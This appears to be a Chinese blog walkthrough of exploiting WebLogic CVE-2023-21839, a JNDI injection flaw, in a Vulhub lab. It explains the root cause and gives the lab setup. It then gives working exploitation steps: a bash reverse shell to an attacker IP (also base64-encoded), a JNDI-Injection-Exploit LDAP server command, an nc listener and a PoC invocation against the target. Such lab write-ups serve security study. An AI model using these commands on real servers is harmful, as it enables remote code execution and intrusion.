WebLogic:CVE-2023-21839[JNDI注入]

原理

1、T3/IIOP协议支持 远程绑定对象 bind到服务端,而且可以通过lookup代码 c.lookup("xxxxxx"); 查看   
2、远程对象继承自OpaqueReference并lookup查看远程对象时,服务端会调用远程对象 getReferent 方法
3、由于 weblogic.deployment.jms.ForeignOpaqueReference继承自 OpaqueReference并实现getReferent方法,存在retVal = context.lookup (this.remoteJNDIName)实现,
所以能够通过RMI/LDAP远程协议进行远程命令执行

环境部署

1.进入靶场目录

cd /vulhub-master/weblogic/CVE-2023-21839

2.开启靶场【报错重启docker服务】

[root@localhost CVE-2023-21839]# docker-compose up -d
 
3.查看靶场端口

[root@localhost CVE-2023-21839]# docker ps

 4.访问靶场

192.168.10.5:7001

漏洞利用

 1.生成指定格式payload 

bash -i >& /dev/tcp/192.168.10.128/7777 0>&1

转换网站:Runtime.exec Payload Generater | AresX's Blog (ares-x.com)

2.kali启动LDAP服务器,指定payload。复制JDK连接地址
java -jar JNDI-Injection-Exploit-1.0.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEyOC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"

3.kali监听本机 7777 端口

nc -lvp 7777

4.windows主机向漏洞服务器发送poc
CVE-2023-21839.exe -ip 192.168.10.5 -port 7001 -ldap ldap://192.168.10.128:1389/lodgjh

5.建立连接

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值